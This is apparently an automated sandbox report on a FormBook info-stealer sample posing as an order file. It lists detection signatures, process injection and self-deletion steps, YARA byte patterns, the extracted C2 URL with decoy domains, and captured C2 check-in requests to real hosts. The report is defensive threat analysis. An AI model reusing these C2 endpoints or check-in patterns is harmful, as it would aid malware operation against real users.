Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Order 122001-220 guanzo.exe

Overview

General Information

Sample Name:Order 122001-220 guanzo.exe
Analysis ID:412023
MD5:9e819bcc826e7a20b0fd139cc4185195
SHA1:bdb33c04403e308dcc79ced36201c577a40f0311
SHA256:5b09da58ac487c25237bf1a8ba98988af849980d5fe92dd1ca417591b977d7a8
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Order 122001-220 guanzo.exe (PID: 864 cmdline: 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe' MD5: 9E819BCC826E7A20B0FD139CC4185195)
    • Order 122001-220 guanzo.exe (PID: 5676 cmdline: C:\Users\user\Desktop\Order 122001-220 guanzo.exe MD5: 9E819BCC826E7A20B0FD139CC4185195)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 1556 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 4700 cmdline: /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjengineering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Order 122001-220 guanzo.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Order 122001-220 guanzo.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.uuoouu-90.store/meub/"], "decoy": ["ebookcu.com", "sherwooddaydesigns.com", "healthcarebb.com", "pixelflydesigns.com", "youtegou.net", "audiokeychin.com", "rioranchoeventscenter.com", "nickofolas.com", "comicstattoosnguns.com", "ally.tech", "paperplaneexplorer.com", "janetkk.com", "sun1981.com", "pocopage.com", "shortagegoal.com", "tbluelinux.com", "servantsheartvalet.com", "jkhushal.com", "91huangyu.com", "portlandconservatory.net", "crazyasskaren.com", "gr8.photos", "silviabiasiolipatisserie.com", "goeseo.com", "shellyluther.com", "salvemosalsuroeste.com", "technologies.email", "xn--80aasvjfhla.xn--p1acf", "dmowang.com", "mylifeusaaatworkportal.com", "electronicszap.com", "thefrankversion.com", "patricksparber.com", "m-kenterprises.com", "goodcreditcardshome.info", "shegotit.club", "nutinbutter.com", "bridgestreetresources.com", "tjanyancha.com", "qqstoneandcabinet.com", "topstitch.info", "shadyshainarae.com", "meucamarimoficial.com", "gatedless.net", "aal888.com", "tstcongo.com", "luckyladybugnailswithlisa.com", "usapersonalshopper.com", "893645tuerigjo.com", "pbjengineering.com", "katbumydbnjk.mobi", "bostonm.info", "amesshop.com", "k-9homefinders.com", "philbaileyrealestate.com", "ahxinnuojie.com", "ardougne.com", "pasteleriaruth.com", "vauvakuumettapodcast.com", "aryamakoran.com", "digitalspacepod.com", "clarkstrain.com", "plantbasedranch.com", "therapylightclub.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Order 122001-220 guanzo.exeVirustotal: Detection: 62%Perma Link
          Source: Order 122001-220 guanzo.exeMetadefender: Detection: 32%Perma Link
          Source: Order 122001-220 guanzo.exeReversingLabs: Detection: 65%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Order 122001-220 guanzo.exeJoe Sandbox ML: detected
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Order 122001-220 guanzo.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Order 122001-220 guanzo.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 122001-220 guanzo.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 4x nop then pop esi1_2_00415838
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop esi3_2_00855838

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49724 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49726 -> 104.164.26.246:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 18.219.49.238:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49729 -> 162.241.62.63:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.uuoouu-90.store/meub/
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1Host: www.comicstattoosnguns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goeseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1Host: www.thefrankversion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1Host: www.tjanyancha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1Host: www.dmowang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1Host: www.pocopage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goodcreditcardshome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1Host: www.pasteleriaruth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1Host: www.amesshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.216 198.54.117.216
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1Host: www.comicstattoosnguns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goeseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSgcH90A9/Nib HTTP/1.1Host: www.shadyshainarae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=xRifbL4BvWher3OHgQRKthYl2aDcqb2ql1CEYfUIGij2TzekdjVq3iFcomd6Mb6Rt5kB&6lt4=M6ATVT20FLj HTTP/1.1Host: www.thefrankversion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1Host: www.tjanyancha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1Host: www.dmowang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1Host: www.pocopage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1Host: www.goodcreditcardshome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1Host: www.pasteleriaruth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1Host: www.amesshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.paperplaneexplorer.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 08:51:24 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672299597.0000000002541000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000002.932522691.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
